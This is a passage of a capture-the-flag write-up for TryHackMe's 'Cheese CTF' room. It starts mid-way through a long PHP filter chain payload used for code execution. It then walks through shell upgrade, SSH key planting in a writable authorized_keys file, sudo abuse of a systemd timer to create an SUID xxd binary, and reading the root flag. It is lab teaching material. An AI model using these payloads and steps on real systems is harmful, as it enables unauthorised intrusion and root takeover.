nv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

We have got a connection as www-data.

Upgrading the current shell a little.

Commands:

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm

Lateral Movement

Checking out the /home directory:

We get the user flag in comte's home directory but we (www-data) as others have no permissions at all on the flag file. Reading the file is not possible at this point.

We can now get inside the .ssh directory:

We as others, have both read and write permissions (rw-) on the authorized_keys file. We can now generate a ssh key pair and the public key can be placed within this file.

Command:

ssh-keygen -t rsa

The public key:

Placing it on the target machine:

Now we can SSH in as comte:

Command:

ssh comte@cheese.thm

Now we can fetch the user flag:

Privilege Escalation

We can now check for comte's sudo rights/privs:

We are allowed to run a few commands related to a systemd timer unit file named exploit.timer, as any user without us being prompted to enter a password. This is our way to get to root.

Timers are files that control .service files or events. So we might later end up finding a .service file that would be of importance.

Let us first find the location of the exploit.timer file.

Command:

find / -name exploit.timer 2> /dev/null

Checking out the file and it's permissions:

The timer file's owner and group are both root. Since we (comte) fall under others, we have read, write & execute permissions (rwx) on the file.

We can now try to start the exploit.timer based on the sudoers entry.

It failed saying there is a bad setting within the file and it tells us to run systemctl status exploit.timer to find out more about the issue. Let us go ahead and do the same.

Upon running the command we notice that this timer unit file is set to trigger a .service file named exploit.service. We have indeed found the file that we had talked about above.

Again, let us start by finding where this .service file is located.

Command:

find / -name exploit.service 2> /dev/null

It is located within the same directory as the exploit.timer file.

Checking out the file:

When the service gets started due to it getting triggered by running the exploit.timer, the command that will be run is this:

/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"

It copies the xxd utility to the /opt directory and sets the SUID bit on it. Since the exploit.timer file will be run with sudo privileges, the root-owned xxd binray gets copied without any permission issues and will have the bit set and this would lead to an easy privilege escalation.

The /opt directory is currently empty without any files.

Now let us get back to the error in the exploit.timer file. It had occurred because no value was set for the OnBootSec directive and it expects one. This directive is meant to specify a duration after boot to start the timer.

The value that we specify doesn't affect our approach at all because if we remember we can start the exploit.timer file manually with sudo privileges. So it will end up triggering the exploit.service immediately.

For the sake of specifying a value for the OnBootSec directive, let us set it to 30 mins:

Now the systemd daemon needs to be reloaded for the changes to take effect.

Command:

sudo systemctl daemon-reload

Now let us start the exploit.timer.

Command:

sudo /bin/systemctl start exploit.timer

All that is left to be checked now is the /opt directory. If everything worked as intended we would be having the root-owned xxd binary in there having the SUID bit set.

And we have it. Since the SUID bit is set, the binary when used will run only with the permissions of the owner, that being root in this case.

This leaves us with a simple xxd privilege escalation:

We have to first set the LFILE variable to read a particular file, in this case, we can directly read the root.txt file:

LFILE=/root/root.txt
./xxd "$LFILE" | xxd -r

We now have the root flag.

Room solved!!

LogoPayloadsAllTheThings/File Inclusion/README.md at master · swisskyrepo/PayloadsAllTheThingsGitHub
LogoGitHub - synacktiv/php_filter_chain_generatorGitHub
Logoxxd | GTFOBins
GTFOBins
LogoTryHackMe | gravereaper2038TryHackMe
Profile Link
LogoCheese CTFTryHackMe
Room Link
Page cover image